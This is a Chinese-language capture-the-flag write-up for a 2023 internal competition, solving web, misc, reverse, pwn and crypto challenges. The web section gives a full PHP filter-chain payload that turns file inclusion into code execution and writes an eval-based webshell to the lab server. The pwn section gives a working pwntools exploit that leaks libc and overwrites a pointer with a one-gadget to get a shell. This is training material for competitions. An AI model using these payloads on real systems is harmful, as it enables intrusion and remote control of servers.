内部赛-2023第三届网络安全攻防大赛团队赛①-线上赛
Web
psms_2
先按提示登录一下。
http://192.168.127.130/?page=php://filter/convert.base64-encode/resource=index
读取源码
https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT 生成 payload
在login.php会判断page参数。
file_to_use = "login"
#<?php eval($_GET[1]);?>a
base64_payload = "PD9waHAgZXZhbCgkX0dFVFsxXSk7Pz5h"
# generate some garbage base64
filters = "convert.iconv.UTF8.CSISO2022KR|"
filters += "convert.base64-encode|"
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
filters += "convert.iconv.UTF8.UTF7|"
for c in base64_payload[::-1]:
filters += open('./res/'+(str(hex(ord(c)))).replace("0x","")).read() + "|"
# decode and reencode to get rid of everything that isn't valid base64
filters += "convert.base64-decode|"
filters += "convert.base64-encode|"
# get rid of equal signs
filters += "convert.iconv.UTF8.UTF7|"
filters += "convert.base64-decode"
final_payload = f"php://filter/{filters}/resource={file_to_use}"
with open('test.php','w') as f:
f.write('<?php echo file_get_contents("'+final_payload+'");?>')
print(final_payload)
然后直接打过去
http://192.168.127.130/?page=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.GBK.UTF-8|convert.iconv.IEC_P27-1.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61|convert.iconv.ISO6937.EUC-JP-MS|convert.iconv.EUCKR.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CN.ISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=login&1=file_put_contents("1.php", base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSkgPz4="));
在 1.php中生成马。蚁剑连接即可
easy_java
会的来发wp
Misc
流量分析实战_2
wireshark导出http, 有个图片,里面套了2个图片。分离出来得到flag。
ZIP
用Advanced Archive Password Recovery暴力破解得到密码839,打开txt文件,得到flag。
Matrix
直接按说明螺旋读取像素到 f11.txt,然后通过rgba转黑白, 先写行再写列。输出图。得到解压密码。
from PIL import Image
img = Image.open('spiral.png')
img = img.convert('RGBA')
x, y = img.size
f = open('f11.txt', 'w', encoding='utf8')
def get_pixel(x, y):
rgba = img.getpixel((x, y))
print(rgba)
r, g, b, a = rgba
f.write(','.join([str(x) for x in rgba]) + '\n')
def function(n):
matrix = [[0] * n for _ in range(n)]
number = 1
left, right, up, down = 0, n - 1, 0, n - 1
while left < right and up < down:
# 从左到右
for i in range(left, right):
matrix[up][i] = number
number += 1
y = up
x = i
get_pixel(x, y)
# 从上到下
for i in range(up, down):
matrix[i][right] = number
number += 1
y = i
x = right
get_pixel(x, y)
# 从右向左
for i in range(right, left, -1):
matrix[down][i] = number
number += 1
y = down
x = i
get_pixel(x, y)
for i in range(down, up, -1):
matrix[i][left] = number
number += 1
y = i
x = left
get_pixel(x, y)
left += 1
right -= 1
up += 1
down -= 1
# n 为奇数的时候,正方形中间会有个单独的空格需要单独填充
if n % 2 != 0:
matrix[n // 2][n // 2] = number
return matrix
function(1024)
from PIL import Image
f = open('f11.txt', 'r', encoding='utf8').read().splitlines()
img = Image.new("RGBA", (1024, 1024), color=(255, 255, 255, 255)) # default black
for num, line in enumerate(f):
rgba = [int(x) for x in line.split(',')]
x, y = num % 1024, num // 1024
if rgba == [255, 255, 255, 255]:
img.putpixel((x, y), (255, 255, 255, 255))
else:
img.putpixel((x, y), (0, 0, 0, 0))
img.save('res.png')
png_2
拆分png文件,补齐文件头。扫码得flag
Re
Firm
按这个配置 https://www.bilibili.com/video/BV1LX4y157TP/
配置好直接一眼 rc4.根据提示需要求key
rc4init(&sbox[4], 0, 252);
strcpy(tbox, "flag{tH14.l4_F@kKkEeeE---f41g}");
*(_DWORD *)key = 0xF4DD0F64;
*(_DWORD *)&key[4] = 0x5173B9F8;
*(_DWORD *)&key[8] = 0xC7D238B2;
*(_DWORD *)&key[12] = 0x9B9FCA8;
*(_DWORD *)&key[16] = 0x286D3C51;
*(_DWORD *)&key[20] = 0x429DE399;
*(_DWORD *)&key[24] = 0x8084307B;
*(_WORD *)&key[28] = 0x9175;
while ( 1 )
{
do
{
while ( fn3(0x40010800, 0x1000) )
;
sub_80005AC(0xAu);
}
while ( fn3(0x40010800, 0x1000) );
v1 = sub_80001B4() | v0;
v17[0] = v1;
if ( v1 >= 0x1000000 )
{
v23 = 0;
rc4init(&v24, 0, 252);
b1 = &t5;
k = &t5;
for ( i = 0; i != 256; ++i )
*++k = i;
v5 = &sbox[255];
v6 = &sbox[255];
然后直接爆破吧.md5提交.
from itertools import product
xorkey = "flag{tH14.l4_F@kKkEeeE---f41g}";
enc = bytearray([0x64, 0x0F, 0xDD, 0xF4, 0xF8, 0xB9, 0x73, 0x51, 0xB2, 0x38,
0xD2, 0xC7, 0xA8, 0xFC, 0xB9, 0x09, 0x51, 0x3C, 0x6D, 0x28,
0x99, 0xE3, 0x9D, 0x42, 0x7B, 0x30, 0x84, 0x80, 0x75, 0x91
])
from Crypto.Cipher import ARC4
def rc4_crypt(msg, key):
cipher = ARC4.new(key)
return cipher.decrypt(msg)
l = list(range(0x20, 0x7f))
for k in product(l, repeat=4):
key = bytearray(k)
res = rc4_crypt(xorkey.encode(), key)
if res == enc:
print('get')
print(key)
exit(0)
再写个c版的
#include <stdio.h>
#include <string.h>
void bf(size_t count, char start, char anEnd, void (*callback)(const char*));
void print_combination(const char *combination);
#include <string.h>
#include <assert.h>
#include "stdio.h"
// 初始化函数
void rc4_init(unsigned char *s, unsigned char *key, unsigned long Len) {
int i = 0, j = 0;
// char k[256]={0};
unsigned char k[256] = {0};
unsigned char tmp = 0;
for (i = 0; i < 256; i++) {
s[i] = i;
k[i] = key[i % Len];
}
for (i = 0; i < 256; ++i) {
j = (j + s[i] + k[i]) % 256;
tmp = s[i];
s[i] = s[j]; // 交换 s[i] 和 s[j]
s[j] = tmp;
}
}
/* 加解密 */
void rc4_crypt(unsigned char *s, unsigned char *Data, unsigned long Len) {
int i = 0, j = 0, t = 0;
unsigned long k = 0;
unsigned char tmp;
for (k = 0; k < Len; ++k) {
i = (i + 1) % 256;
j = (j + s[i]) % 256;
tmp = s[i];
s[i] = s[j]; // 交换 s[i] 和 s[j]
s[j] = tmp;
t = (s[i] + s[j]) % 256;
Data[k] ^= s[t];
}
}
int main() {
setbuf(stdout, NULL);
size_t count =4;
char start = 0x20, end = 0x7f;
bf(count, start, end, print_combination);
return 0;
}
void bf(size_t count, char start, char anEnd, void (*callback)(const char *combination)) {
char arr[count + 1];
arr[count] = '\0';
for (size_t i = 0; i < count; ++i) {
arr[i] = start;
}
while (1) {
(*callback)(arr);
ssize_t j;
for (j = count - 1; j >= 0; --j) {
char key[count + 1];
char sbox[256];
char data[] = {0x64, 0x0F, 0xDD, 0xF4, 0xF8, 0xB9, 0x73, 0x51, 0xB2, 0x38, 0xD2, 0xC7, 0xA8, 0xFC, 0xB9, 0x09, 0x51, 0x3C, 0x6D, 0x28, 0x99, 0xE3, 0x9D, 0x42, 0x7B, 0x30, 0x84, 0x80, 0x75, 0x91};
memcpy(key, arr, count);
rc4_init(sbox, key, strlen(key));
rc4_crypt(sbox, data, strlen(data));
char enc[17] = {0};
for (int i = 0; i < strlen(data); ++i) {
sprintf(enc + i, "%c",(unsigned char ) data[i]);
}
if (strcmp(enc, "flag{tH14.l4_F@kKkEeeE---f41g}") == 0) {
printf("get key: %s\n", key);
return;
}
if (arr[j] == anEnd) {
if (j == 0) return; // 已完成
arr[j] = start;
} else {
arr[j]++;
break;
}
}
}
}
void print_combination(const char *combination) {
printf("%s\n", combination);
}
Pwn
橘子
from pwn import *
context.log_level = 'debug'
o = process("./pwn")
# o = remote("00.00.00.00", 0000)
elf = ELF("./pwn")
libc = ELF("./libc-2.23.so")
puts_got = elf.got['puts']
o.sendlineafter(b"input your chioce:", b'2')
o.sendlineafter(b"Index :\n", b"-72")
o.sendlineafter(b"Size :\n", b'8')
o.sendafter(b"Content :\n", p64(puts_got))
o.sendlineafter(b"input your chioce:", b'3')
o.sendlineafter(b"Index :\n", b"-40")
puts_addr = u64(o.recv(6) + b'\x00\x00')
libc_base = puts_addr - libc.sym['puts']
log.info(hex(libc_base))
gadget = libc_base + 0x45226
o.sendlineafter(b"input your chioce:", b'2')
o.sendlineafter(b"Index :\n", b"-40")
o.sendlineafter(b"Size :\n", b'8')
payload = p64(gadget)
o.sendafter(b"Content :\n", payload)
o.interactive()
Crypto
Math
第一部分求取n与hint1的公因子,可以得到素因子r
第二部分分析myfunction函数:
\(\begin{align*} output &= \Sigma_{i=0}^{num-1} (6*i+6*j+1)\\ &= \Sigma 6*i + 6*\Sigma_{k=0}^{i-1}k + 1 \\ &= \Sigma_{i=0}^{num-1} 6*i + 3*i*(i-1) + 1\\ &= num + \frac{3*num*(num-1)}{2} + \frac{(num-1)*num*(2*num-1)}{2}\\ &\Rightarrow output = 0 \pmod{num^2} \\ &\Rightarrow hint_2 = 3*lp*n + 1 \pmod{n^2} \end{align*}\)
利用hint2的值可以计算出素因子p的低400bit,使用coppersmith求解高位即得到素因子p的值
至此,大整数n的三个素因子pqr已经成功分解,可以解密rsa得到m的值
第三部分分析All函数,由幂级数分析知\(T.Point(i) = Sqrt(i)\),因此:
\(\begin{align*} output &= \Sigma_{i=3}^{bound-1}\frac{Sqrt(i) + Sqrt(i+1)}{2} \\ &= \Sigma_{i=3}^{bound-1} \frac{Sqrt(i)}{2} + \Sigma_{i=4}^{bound} \frac{Sqrt(i)}{2}\\ &= \frac{(bound)^{\frac{3}{2}} + (bound+1)^{\frac{3}{2}} - 3^{\frac{3}{2}} - 4^{\frac{3}{2}}}{3} \end{align*}\)
计算出k的值,将k与m的值处理后异或得到flag
# sage
flag_len = 42
n = 1885106209951408608833065466098355578239648885277085979696889428331716535742564778501798478665957825315340421821880653818505857049636611632357321104069926874970489073929053910350131880591544986024406953378391135673202854750625745159391997973535848495128365477217006260495413869532372418221652962946340513593002422433536479789576519469228846773250447077165756739529520975715667675188738514871033908115371290569902086064227476952606366538782284487477820835988316471
c = 696238728213276154324787695659767792043458798396732235983493075871691401810545168845655490352789752222363100922123671319198981013421632076090146254867823593523050502577701155837063376958530879006719716789887624440134559774538443909463537086796915613123528679984244371544503657821859556837415229166015914540860398289216765611441964228176020361651359395184571105468667815326494558761738459063914192172836518999575866452752941368767971539919141604299843463853501960
hint1 = 47533994701669017942592643580845693193316601935087923279407365999451221242084261195588230994183718077379066856479267476895986608547324057765879168010176037349172136581929046771540241367625486215731295814611283581608613208990206581757576978017732022062210538697720930605552259306749633658032304554578427461842934055558865521604512892691323385156889995854702621568441768712619224249280792783364635307739215957762771386413831279443875185633720270001928747743847856394847878232194076679733830705297410959656270945532930199517880949
hint2 = 1345739841248959791137389026125065605121513428784838684290299665636596562317989590469829195181078904857051392378877013458099983407103737518119999468489762053545474516182879516762580472262640794849609626308003164739287189671066241628052826558582865342176036139097546843281565147798609965645514151827840249686650855385385323417455247722134760335695053787221300451942370377598800841980049138341564555801417479362085565640973199260631136149016266661293883650801813550118778433333591258278147003619871962070136454674193198696690506092831171400435490432196636796719177624389194619648086397178720207413652618636521150924913978530986709499047969775311955879302418093270101476537853298615347062384026172441455857088955847766335746521291043747795520485020303040819568036819058385444936925860671650596681910380157657689041971132993731048618045570715513584627109356139903842365556697314631573799394266292587334468008221427502353566938518574247502783245674619641519095644135976062817840893465238031354234069073928763492529419021632732679912738674105898149050223970723297059883534089683179512881491210176114419520070007595698242827625902377045860953285447617249204919971737086366
# i: 0-num-1
# j: \Sigma_0^{i-1} = (i-1)*i/2
# output: \Sigma 6i+6j+1 -> num + 3*Sigma(i) + 3*Sigma (i^2) -> num + 3*(num-1)*num/2 + (num-1)*num*(2*num-1)/2
# => mod = 0 (mod n^2)
# => hint2 = 3*lp*n + 1
def q_myfunction(num):
return num + 3*(num-1)*num//2 + (num-1)*num*(2*num-1)//2
# Point(center) -> sqrt(center)
# All(bound) = Sigma_{i=3}^{bound-1} (Point(i) + Point(i+1)) / 2
# All(bound) = Sigma_{i=3}^{bound-1} Point(i)/2 + Sigma_{i=3}^{bound-1} Point(i+1)/2
# All(bound) = f(bound) + f(bound+1) - f(3) - f(4)
def q_All(bound):
f = lambda x: sqrt(pow(x, 3))/3
ans = f(bound) + f(bound+1) - f(3) - f(4)
return int(ans.round())
r = GCD(n, hint1)
mod = q_myfunction(n)
assert mod % n^2 == 0
lp = ((hint2 - 1) // n) * pow(3,-1, n) % n
R.<x> = Zmod(n // r)[]
f = x*2^400 + lp
ans = f.monic().small_roots(X=2^112, beta=0.4, epsilon=0.05)
p = int(ans[0]*2^400 + lp)
q = n // (r * p)
m = int(pow(c, pow(65537, -1,(p-1)*(q-1)*(r-1)), n))
k = q_All(n)
print(k)
print(m)
pip3 install pycryptodome
python
脚本
from Crypto.Util.number import *
from Crypto.Util.strxor import strxor
k = 1725490120691188977680801867268140317180866567184633816990773897414250041053071846552746468670403579164534282324880877191090563667724329805671136851331399964592724852151079596574327952778864262234480446294407714108339709290342228564235547085394128599431757611753190980192853546038426666697909244474806985963092628116534163492986542344866325828836263051101493171761508979316839471579268072635782005059440060473936978405674039384693849714039996204381285389108635299521920093753533122242788625872805502762015954028389721763351835165159462453407764814558080506621939080790569219875550951691983330371610868596149763698827962621406416674641721708079682683853213408545250020671944108242756094754464508
m = 19894460456609555207141061120215061100672222195573875603062923560352656107168638392636383064883699622103499433418273590323681358433240609501160649046445135408992683042105925775331604863270063149446744906836114988556294567039453806150715544405637329807186077487136724139201359030326054589492264168333429507981168991945650732574444912703747559357669819076763666696748139319621405402912373679015748260200384412165637497627755720960768809057628444943258820056314
k = long_to_bytes(k >> (k.bit_length() - 8 * flag_len))
m = long_to_bytes(m)[:flag_len]
flag = strxor(m, k)
print(flag)
# flag{84934a62-f932-968c-fa88-22f0284c0e8e}